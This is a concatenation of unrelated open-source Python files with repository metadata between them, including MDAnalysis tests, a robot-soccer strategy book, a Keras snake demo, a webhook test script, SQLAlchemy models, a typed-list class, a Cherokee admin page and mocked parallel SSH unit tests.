# clear everything
self.clear()
# if specified, use a specific snapshot
if snapshot:
self._history.rotate(-(snapshot - 1))
self._in.extend(loads_(self._history.popleft()))
return self
def _snapshot(self, d=optimize):
# take baseline snapshot of incoming things
self._baseline = d(self._in)
return self
def _rollback(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# revert to baseline snapshot of incoming things
self._in.extend(loads_(self._baseline))
return self
def _revert(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# clear baseline
self._baseline = None
# restore original snapshot of incoming things
self._in.extend(loads_(self._original))
return self
def _clear(self, list_=list):
# clear worker
self._worker = None
# clear worker positional arguments
self._args = ()
# clear worker keyword arguments
self._kw = {}
# default iterable wrapper
self._wrapper = list_
# clear pipe
self._pipe = None
# clear incoming things
self._in.clear()
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
# clear outgoing things
self._out.clear()
return self
def _iterate(self, iter_=iter):
return iter_(self._out)
def _peek(self, len_=len, list_=list):
wrap, out = self._wrapper, self._in
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
def _get(self, len_=len, list_=list):
wrap, out = self._wrapper, self._out
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
| bsd-3-clause | -5,760,023,825,560,073,000 | 28.193694 | 72 | 0.569511 | false |
kain88-de/mdanalysis | testsuite/MDAnalysisTests/analysis/test_persistencelength.py | 1 | 3982 | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
from __future__ import print_function, division, absolute_import
import MDAnalysis
from MDAnalysis.analysis import polymer
from MDAnalysis.exceptions import NoDataError
import numpy as np
from numpy.testing import (
assert_,
assert_almost_equal,
assert_raises,
dec
)
from MDAnalysisTests.datafiles import Plength
from MDAnalysisTests import module_not_found
class TestPersistenceLength(object):
def setUp(self):
self.u = MDAnalysis.Universe(Plength)
def tearDown(self):
del self.u
def test_ag_VE(self):
ags = [self.u.atoms[:10], self.u.atoms[10:110]]
assert_raises(ValueError, polymer.PersistenceLength, ags)
def _make_p(self):
ags = [r.atoms.select_atoms('name C* N*')
for r in self.u.residues]
p = polymer.PersistenceLength(ags)
return p
def test_run(self):
p = self._make_p()
p.run()
assert_(len(p.results) == 280)
assert_almost_equal(p.lb, 1.485, 3)
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit(self):
p = self._make_p()
p.run()
p.perform_fit()
assert_almost_equal(p.lp, 6.504, 3)
assert_(len(p.fit) == len(p.results))
@dec.skipif(module_not_found('matplotlib'),
"Test skipped because matplotlib is not available.")
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_plot_ax_return(self):
'''Ensure that a matplotlib axis object is
returned when plot() is called.'''
import matplotlib
p = self._make_p()
p.run()
p.perform_fit()
actual = p.plot()
expected = matplotlib.axes.Axes
assert_(isinstance(actual, expected))
def test_raise_NoDataError(self):
'''Ensure that a NoDataError is raised if
perform_fit() is called before the run()
method of AnalysisBase.'''
p = self._make_p()
assert_raises(NoDataError, p.perform_fit)
class TestFitExponential(object):
def setUp(self):
self.x = np.linspace(0, 250, 251)
self.a_ref = 20.0
self.y = np.exp(-self.x / self.a_ref)
def tearDown(self):
del self.x
del self.a_ref
del self.y
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit_simple(self):
a = polymer.fit_exponential_decay(self.x, self.y)
assert_(a == self.a_ref)
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit_noisy(self):
noise = np.sin(self.x) * 0.01
y2 = noise + self.y
a = polymer.fit_exponential_decay(self.x, y2)
assert_almost_equal(a, self.a_ref, decimal=3)
#assert_(np.rint(a) == self.a_ref)
| gpl-2.0 | 5,267,376,116,619,991,000 | 31.639344 | 79 | 0.630337 | false |
agingrasc/StrategyIA | ai/STA/Strategy/StrategyBook.py | 1 | 1930 | # Under MIT license, see LICENSE.txt
""" Livre des stratégies. """
from .HumanControl import HumanControl
from .SimpleDefense import SimpleDefense
from .SimpleOffense import SimpleOffense
from .DoNothing import DoNothing
class StrategyBook(object):
"""
Cette classe est capable de récupérer les stratégies enregistrés dans la
configuration des stratégies et de les exposer au Behavior Tree en
charge de sélectionner la stratégie courante.
"""
def __init__(self, p_info_manager):
self.strategy_book = {'SimpleDefense' : SimpleDefense,
'SimpleOffense' : SimpleOffense,
'HumanControl' : HumanControl,
'DoNothing' : DoNothing }
self.info_manager = p_info_manager
def get_strategies_name_list(self):
return list(self.strategy_book.keys())
def ball_in_offense_zone(self):
self.team_zone_side = "left" # constante bidon TODO: trouver une facon de demander au InfoManager notre zone initiale
self.ball_x_position = self.info_manager.get_ball_position().x
if self.team_zone_side == "left":
return self.ball_x_position > 0
return self.ball_x_position < 0
def most_opponents_in_our_zone(self):
pass
def get_optimal_strategy(self):
# simple choice
if self.ball_in_offense_zone():
self.chosen_strategy = SimpleOffense
else:
self.chosen_strategy = SimpleDefense
self.chosen_strategy = DoNothing
return self.chosen_strategy
def get_strategy(self, strategy_name):
return self.strategy_book[strategy_name]
def debug_show_all_players_tactics(self):
for i in range(0,6):
debug_string = ""
debug_string += "Robot:" + str(i) + str(self.info_manager.get_player_tactic(i))
print(debug_string)
| mit | -4,660,321,697,038,851,000 | 33.321429 | 126 | 0.631634 | false |
s-macke/Kerasimo | models/snake.py | 1 | 1336 | from keras.models import Sequential, load_model
from keras.layers import *
from qlearning4k.games import Snake
from keras.optimizers import *
from qlearning4k import Agent
from lib import kerasimo
grid_size = 10
nb_frames = 4
nb_actions = 5
snake = Snake(grid_size)
model = load_model('models/snake.hdf5')
#model = Sequential()
#model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(nb_frames, grid_size, grid_size)))
#model.add(Conv2D(32, (3, 3), activation='relu'))
#model.add(Flatten())
#model.add(Dense(256, activation='relu'))
#model.add(Dense(nb_actions))
#model.compile(RMSprop(), 'MSE')
agent = Agent(model=model, memory_size=-1, nb_frames=nb_frames)
#model.save('/tmp/snake1.hdf5')
#agent.train(snake, batch_size=64, nb_epoch=10000, gamma=0.8)
#model.save('/tmp/snake2.hdf5')
#agent.play(snake)
snake.reset()
agent.clear_frames()
S = agent.get_game_data(snake)
game_over = False
frames = list()
frames.append(S[0])
while not game_over:
q = model.predict(S)[0]
possible_actions = snake.get_possible_actions()
q = [q[i] for i in possible_actions]
action = possible_actions[np.argmax(q)]
snake.play(action)
S = agent.get_game_data(snake)
frames.append(S[0])
game_over = snake.is_over()
print(np.asarray(frames).shape)
kerasimo.ToSVG('snake', model, np.array(frames), showarrows=False, columns=[1,3,3,10,10,1])
| mit | -1,961,486,161,902,618,600 | 28.688889 | 96 | 0.719311 | false |
tasleson/lsm-ci | testing/github_event_gen.py | 1 | 2009 | """
Used for testing the service locally
"""
import argparse
import hashlib
import hmac
import os
import requests
import json
GIT_SECRET = os.getenv("GIT_SECRET", "")
PORT_NUM = os.getenv("PORT_NUM", "43301")
IP_ADDRESS = os.getenv("IP_ADDRESS", "127.0.0.1")
def gen_signature(data):
"""
Generate the signature for the data.
:param data: Data to generate signature for
:return: "sha1=<hexdigest>"
"""
h = hmac.new(GIT_SECRET.encode("utf-8"), data.encode("utf-8"), hashlib.sha1)
s = "sha1=" + h.hexdigest()
return s.encode("utf-8")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="github event creation")
parser.add_argument(
"--clone_url",
dest="clone_url",
default="https://github.com/tasleson/libstoragemgmt.git",
)
parser.add_argument("--branch", dest="branch", default="master")
parser.add_argument(
"--sha1",
dest="sha1",
default="4a956debabed9d02e7c076d85d1f2d18eb11b549",
)
args = parser.parse_args()
url = "http://%s:%s/event_handler" % (IP_ADDRESS, PORT_NUM)
head = {
"Content-type": "application/json",
"X-Hub-Signature": "",
"X-Github-Event": "pull_request",
}
body = dict()
body["pull_request"] = dict()
body["pull_request"]["base"] = dict()
body["pull_request"]["head"] = dict()
body["pull_request"]["base"]["repo"] = dict()
body["pull_request"]["head"]["repo"] = dict()
body["pull_request"]["base"]["repo"][
"full_name"
] = "libstorage/libstoragemgmt"
body["pull_request"]["head"]["repo"]["clone_url"] = args.clone_url
body["pull_request"]["head"]["sha"] = args.sha1
body["pull_request"]["head"]["ref"] = args.branch
body_json = json.dumps(body)
head["X-Hub-Signature"] = gen_signature(body_json)
response = requests.post(
url=url, headers=head, data=body_json.encode("utf-8")
)
print("status = %d" % int(response.status_code))
| apache-2.0 | -6,225,019,245,875,923,000 | 24.75641 | 80 | 0.599303 | false |
mfa/weight-app | weight/manage.py | 1 | 1205 | #!/usr/bin/env python
""" Part of weight_app
:copyright: (c) 2012 by Andreas Madsack.
:license: BSD, see LICENSE for more details.
"""
from flask.ext.script import Manager
from main import create_app, db
from utils import new_pw, get_emailaddress
# flask-Script
manager = Manager(create_app)
@manager.command
def createdb():
""" Create Database (with initial user)
"""
import models
db.create_all()
add_user(u'admin', email=get_emailaddress())
@manager.command
def add_user(username, email, quiet=False):
""" Adds a User to the database with a random password and prints
the random password.
"""
from models import User
if User.query.get(username):
print("User %s already exists!" % username)
return
u = User(username=username,
email=email.strip())
pw = new_pw()
u.set_password(pw)
if not quiet:
print("Password for %s set to: %s" % (username, pw))
db.session.add(u)
db.session.commit()
@manager.command
def import_from_xml(filename, username):
from utils import import_weight_from_xml
import_weight_from_xml(filename, username)
if __name__ == '__main__':
manager.run()
| bsd-3-clause | -5,661,920,201,830,214,000 | 23.591837 | 69 | 0.651452 | false |
jlgoldman/writetogov | database/db_models.py | 1 | 4654 | from geoalchemy2 import Geography
from sqlalchemy.dialects import postgresql
from database import db
from util import fips
from util import text
SRID = 4326
# This table is auto-generated by shp2sql based on the TIGER shapefile
# tl_2016_us_cd115.zip (https://www.census.gov/cgi-bin/geo/shapefiles/index.php?year=2016&layergroup=Congressional+Districts+%28115%29).
# We then augment it with additional columns for state
# name and code, since by default it only includes FIPS codes.
#
# Table creation was initiated using:
# shp2pgsql -G -s 4269:4326 tl_2016_us_cd115.shp district > district_raw.sql
#
# Table altered using:
# ALTER TABLE district
# ADD COLUMN state_name character varying(50),
# ADD COLUMN state_code character varying(2),
# ADD COLUMN district_code character varying(4);
# CREATE INDEX idx_district_state_code ON district USING btree (state_code);
# CREATE INDEX idx_district_district_code ON district USING btree (district_code);
#
# Then extra columns are popualted using database/populate_district_codes.py
class District(db.Model):
gid = db.Column(db.Integer, primary_key=True)
statefp = db.Column(db.String(2), index=True) # FIPS code
cd115fp = db.Column(db.String(2), index=True) # FIPS code
# Added manually
state_name = db.Column(db.String(50))
state_code = db.Column(db.String(2), index=True)
district_code = db.Column(db.String(4), index=True)
geoid = db.Column(db.String(4))
namelsad = db.Column(db.String(41))
lsad = db.Column(db.String(2))
cdsessn = db.Column(db.String(3))
mtfcc = db.Column(db.String(5))
funcstat = db.Column(db.String(1))
aland = db.Column(postgresql.DOUBLE_PRECISION)
awater = db.Column(postgresql.DOUBLE_PRECISION)
intptlat = db.Column(db.String(11))
intptlon = db.Column(db.String(12))
geog = db.Column(Geography('MultiPolygon', srid=SRID))
class Rep(db.Model):
class Chamber(object):
HOUSE = 'h'
SENATE = 's'
class Status(object):
ACTIVE = 'a'
LEFT_CONGRESS = 'l'
DEFEATED_IN_GENERAL = 'd'
DEFEATED_IN_PRIMARY = 'e'
RETIRING = 'r'
SEEKING_OTHER_OFFICE = 'o'
PENDING_RESULT = 'p'
rep_id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(100))
last_name = db.Column(db.String(100))
state_code = db.Column(db.String(2), index=True)
district_number = db.Column(db.Integer, index=True)
district_code = db.Column(db.String(4), index=True)
party_code = db.Column(db.String(1), index=True)
chamber = db.Column(db.String(1), index=True)
email_link = db.Column(db.String(100))
email = db.Column(db.String(100))
website = db.Column(db.String(255))
address_dc = db.Column(db.String(255))
phone_dc = db.Column(db.String(20))
bioguide_id = db.Column(db.String(10))
status = db.Column(db.String(1), index=True)
status_note = db.Column(db.String(100))
def state_name(self):
return fips.get_state_name_for_code(self.state_code)
def district_ordinal(self):
if self.chamber == self.Chamber.HOUSE:
return text.ordinal(self.district_number) if self.district_number > 0 else 'At-Large'
return None
class Reminder(db.Model):
class Frequency(object):
WEEKLY = 'w'
MONTHLY = 'm'
class Status(object):
ACTIVE = 'a'
UNSUBSCRIBED = 'u'
reminder_id = db.Column(db.BigInteger, primary_key=True)
email = db.Column(db.String(100), index=True)
frequency = db.Column(db.String(1), index=True)
status = db.Column(db.String(1), index=True)
last_contacted = db.Column(db.DateTime(timezone=True), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class RepMailing(db.Model):
rep_mailing_id = db.Column(db.BigInteger, primary_key=True)
rep_id = db.Column(db.Integer, index=True)
email = db.Column(db.String(100), index=True)
stripe_charge_id = db.Column(db.String(50), index=True)
lob_letter_id = db.Column(db.String(50), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class Issue(db.Model):
issue_id = db.Column(db.BigInteger, primary_key=True)
creator_email = db.Column(db.String(100), index=True)
creator_name = db.Column(db.String(100))
title = db.Column(db.String(100))
description = db.Column(db.Text)
rep_ids = db.Column(postgresql.ARRAY(db.Integer))
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
| bsd-3-clause | 6,247,504,885,244,312,000 | 37.783333 | 136 | 0.68049 | false |
zbraniecki/pyast | pyast/typedlist.py | 1 | 4961 | import sys
import re
# Temporary solution for string/unicode in py2 vs py3
if sys.version >= '3':
basestring = str
class TypedList(list):
"""Strongly typed list
All elements of the list must be one of the given types.
Attributes:
init - initial values
types - allowed types
null - can the list be null
Types may be either classes or strings. If types are strings then the value
of the field may be only a string matching one of the types.
examples:
TypedList([Identifier(), Identifier()], (Identifier, Literal))
TypedList([], Expression, null=True)
ast.field(["+","-","+"], ("+","-","="))
"""
_type = 'class' # class | str | pattern
def __init__(self, types, init=None, null=False):
super(TypedList, self).__init__()
if isinstance(types, basestring) or not hasattr(types, '__iter__'):
self._types = (types,)
else:
self._types = types
tset = set([type(t) for t in self._types])
self._null = null
if len(tset) == 1:
tset = tset.pop()
self.__enforceType = self.__selectEnforcementMethod(tset)
else:
self.__enforceType = self.__enforceTypeMixed
if init:
self.extend(init)
elif null is False:
raise TypeError("This list must not be empty")
def __repr__(self, template=None):
#fields = self._fields
#if len(field) >= len(list_template):
# list_template += [getfillvalue(self, i)] * (len(field)-len(list_template)+1)
# fields[i] = ''.join(['%s%s' % x for x in zip_longest(
# list_template,
# map(stringify, field),
# fillvalue=''
# )])
#else:
# fields[i] = ', '.join(map(stringify, field))
#return self._template % fields
if template is None:
return list.__repr__(self)
else:
s = template()
return s
def __selectEnforcementMethod(self, t):
if issubclass(t, (basestring, int)):
return self.__enforceTypeStrInt
elif t is re._pattern_type:
return self.__enforceTypePattern
elif isinstance(t, type):
return self.__enforceTypeClass
def __enforceTypeMixed(self, items):
res = []
for item in items:
et = self.__selectEnforcementMethod(type(item))
res.append(et((item,)))
if all(res):
return
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeStrInt(self, items):
if all(i in self._types for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeClass(self, items):
if all(isinstance(i, self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypePattern(self, items):
if all(any(j.match(i) for j in self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def append(self, item):
self.__enforceType((item,))
return super(TypedList, self).append(item)
def insert(self, pos, item):
self.__enforceType((item,))
return super(TypedList, self).insert(pos, item)
def extend(self, items):
self.__enforceType(items)
return super(TypedList, self).extend(items)
def pop(self, key=-1):
if self._null is False and len(self) == 1:
raise TypeError("This list must not be empty")
return super(TypedList, self).pop(key)
def __delitem__(self, k):
if self._null is False:
if type(k) is slice:
absslice = k.indices(len(self))
if absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
elif len(self) == 1:
raise TypeError("This list must not be empty")
return list.__delitem__(self, k)
def __setitem__(self, key, value):
self.__enforceType(value if hasattr(value, '__iter__') else (value,))
return list.__setitem__(self, key, value)
def __setslice__(self, i, j, sequence):
self.__enforceType(sequence)
return list.__setslice__(self, i, j, sequence)
def __delslice__(self, i, j):
absslice = slice(i, j).indices(len(self))
if self._null is False and absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
return list.__delslice__(self, i, j)
| bsd-3-clause | -4,534,332,588,961,025,000 | 33.93662 | 89 | 0.549083 | false |
chetan/cherokee | admin/PageNewConfig.py | 1 | 5653 | # -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
# Taher Shihadeh <[email protected]>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
import Page
import Cherokee
import os
from config_version import config_version_get_current
from consts import *
from configured import *
URL_BASE = '/create_config'
URL_APPLY = '/create_config/apply'
HELPS = [('index', N_("Index"))]
NOTE_LOADING = N_("Loading new configuration file..")
WARNING_NOT_FOUND = N_("<b>The configuration is not found</b>.<br />You can create a new configuration file and proceed to customize the web server.")
DEFAULT_PID_LOCATIONS = [
'/var/run/cherokee.pid',
os.path.join (PREFIX, 'var/run/cherokee.pid')
]
CHEROKEE_MIN_DEFAULT_CONFIG = """# Default configuration
server!pid_file = %s
vserver!1!nick = default
vserver!1!document_root = /tmp
vserver!1!rule!1!match = default
vserver!1!rule!1!handler = common
""" % (DEFAULT_PID_LOCATIONS[0])
class ConfigCreator:
def __call__ (self, profile):
if profile == 'regular':
return self._create_config ("cherokee.conf.sample")
elif profile == 'static':
return self._create_config ("performance.conf.sample")
elif profile == 'development':
re = self._create_config ("cherokee.conf.sample")
if not re:
return False
self._tweak_config_for_dev()
return True
def _create_config (self, template_file):
file = CTK.cfg.file
if os.path.exists (file):
return True
dirname = os.path.dirname(file)
if dirname and not os.path.exists (dirname):
try:
os.mkdir (dirname)
except:
print "ERROR: Could not create directory '%s'" %(dirname)
return False
content = "config!version = %s\n" %(config_version_get_current())
conf_sample = os.path.join(CHEROKEE_ADMINDIR, template_file)
if os.path.exists (conf_sample):
content += open(conf_sample, 'r').read()
else:
content += CHEROKEE_MIN_DEFAULT_CONFIG
try:
f = open(file, 'w+')
f.write (content)
f.close()
except:
print "ERROR: Could not open '%s' for writing" %(file)
return False
CTK.cfg.load()
return True
def _tweak_config_for_dev (self):
del(CTK.cfg['server!bind'])
del(CTK.cfg['server!pid_file'])
del(CTK.cfg['vserver!1!logger'])
CTK.cfg['server!bind!1!port'] = "1234"
CTK.cfg['server!log_flush_lapse'] = "0"
CTK.cfg['vserver!1!rule!5!handler!type'] = "normal"
CTK.cfg['vserver!1!error_writer!type'] = "stderr"
CTK.cfg['source!2!type'] = "host"
CTK.cfg['source!2!nick'] = "localhost 8000"
CTK.cfg['source!2!host'] = "localhost:8000"
CTK.cfg.save()
def apply():
creator = ConfigCreator()
profile = CTK.post.pop('create')
if creator (profile):
return CTK.cfg_reply_ajax_ok()
return {'ret': 'fail'}
class Form (CTK.Container):
def __init__ (self, key, name, label, **kwargs):
CTK.Container.__init__ (self, **kwargs)
box = CTK.Box({'class': 'create-box %s' %(key)})
box += CTK.RawHTML('<h3>%s</h3>' %(name))
box += CTK.RawHTML('<span>%s</span>' %(label))
submit = CTK.Submitter(URL_APPLY)
submit += CTK.Hidden('create', key)
submit += CTK.SubmitterButton (_('Create'))
submit.bind ('submit_success',
"$('#main').html('<h1>%s</h1>');"%(NOTE_LOADING) + CTK.JS.GotoURL('/'))
box += submit
box += CTK.RawHTML('<div class="ui-helper-clearfix"></div>')
self += box
class Render:
def __call__ (self):
container = CTK.Container()
container += CTK.RawHTML("<h2>%s</h2>" %(_('Create a new configuration file:')))
key = 'regular'
name = _('Regular')
label = _('Regular configuration: Apache logs, MIME types, icons, etc.')
container += Form (key, name, label)
key = 'static'
name = _('Static Content')
label = _('Optimized to send static content.')
container += Form (key, name, label)
key = 'development'
name = _('Server Development')
label = _('No standard port, No log files, No PID file, etc.')
container += Form (key, name, label)
page = Page.Base(_('New Configuration File'), body_id='new-config', helps=HELPS)
page += CTK.RawHTML("<h1>%s</h1>" %(_('Configuration File Not Found')))
page += CTK.Notice ('warning', CTK.RawHTML(_(WARNING_NOT_FOUND)))
page += CTK.Indenter (container)
return page.Render()
CTK.publish ('^%s'%(URL_BASE), Render)
CTK.publish ('^%s'%(URL_APPLY), apply, method="POST")
| gpl-2.0 | 1,322,259,753,467,315,200 | 29.89071 | 150 | 0.587122 | false |
emedvedev/st2 | st2actions/tests/unit/test_parallel_ssh.py | 1 | 11187 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from mock import (patch, Mock, MagicMock)
import unittest2
from st2actions.runners.ssh.parallel_ssh import ParallelSSHClient
from st2actions.runners.ssh.paramiko_ssh import ParamikoSSHClient
from st2actions.runners.ssh.paramiko_ssh import SSHCommandTimeoutError
import st2tests.config as tests_config
tests_config.parse_args()
class ParallelSSHTests(unittest2.TestCase):
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_password(self):
hosts = ['localhost', '127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
password='ubuntu',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'password': 'ubuntu',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
expected_conn['hostname'] = host
client._hosts_client[host].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_random_ports(self):
hosts = ['localhost:22', '127.0.0.1:55', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
password='ubuntu',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'password': 'ubuntu',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
hostname, port = client._get_host_port_info(host)
expected_conn['hostname'] = hostname
expected_conn['port'] = port
client._hosts_client[hostname].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_key(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'key_filename': '~/.ssh/id_rsa',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
hostname, port = client._get_host_port_info(host)
expected_conn['hostname'] = hostname
expected_conn['port'] = port
client._hosts_client[hostname].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_bastion(self):
hosts = ['localhost', '127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
bastion_host='testing_bastion_host',
connect=False)
client.connect()
for host in hosts:
hostname, _ = client._get_host_port_info(host)
self.assertEqual(client._hosts_client[hostname].bastion_host, 'testing_bastion_host')
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'run', MagicMock(return_value=('/home/ubuntu', '', 0)))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_run_command(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.run('pwd', timeout=60)
expected_kwargs = {
'timeout': 60
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].run.assert_called_with('pwd', **expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_run_command_timeout(self):
# Make sure stdout and stderr is included on timeout
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
mock_run = Mock(side_effect=SSHCommandTimeoutError(cmd='pwd', timeout=10,
stdout='a',
stderr='b'))
for host in hosts:
hostname, _ = client._get_host_port_info(host)
host_client = client._hosts_client[host]
host_client.run = mock_run
results = client.run('pwd')
for host in hosts:
result = results[host]
self.assertEqual(result['failed'], True)
self.assertEqual(result['stdout'], 'a')
self.assertEqual(result['stderr'], 'b')
self.assertEqual(result['return_code'], -9)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'put', MagicMock(return_value={}))
@patch.object(os.path, 'exists', MagicMock(return_value=True))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_put(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.put('/local/stuff', '/remote/stuff', mode=0744)
expected_kwargs = {
'mode': 0744,
'mirror_local_mode': False
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].put.assert_called_with('/local/stuff', '/remote/stuff',
**expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'delete_file', MagicMock(return_value={}))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_delete_file(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.delete_file('/remote/stuff')
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].delete_file.assert_called_with('/remote/stuff')
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'delete_dir', MagicMock(return_value={}))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_delete_dir(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.delete_dir('/remote/stuff/', force=True)
expected_kwargs = {
'force': True,
'timeout': None
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].delete_dir.assert_called_with('/remote/stuff/',
**expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_host_port_info(self):
client = ParallelSSHClient(hosts=['dummy'],
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
# No port case. Port should be 22.
host_str = '1.2.3.4'
host, port = client._get_host_port_info(host_str)
self.assertEqual(host, host_str)
self.assertEqual(port, 22)
# IPv6 with square brackets with port specified.
host_str = '[fec2::10]:55'
host, port = client._get_host_port_info(host_str)
self.assertEqual(host, 'fec2::10')
self.assertEqual(port, 55)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'run', MagicMock(
return_value=(json.dumps({'foo': 'bar'}), '', 0))
)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
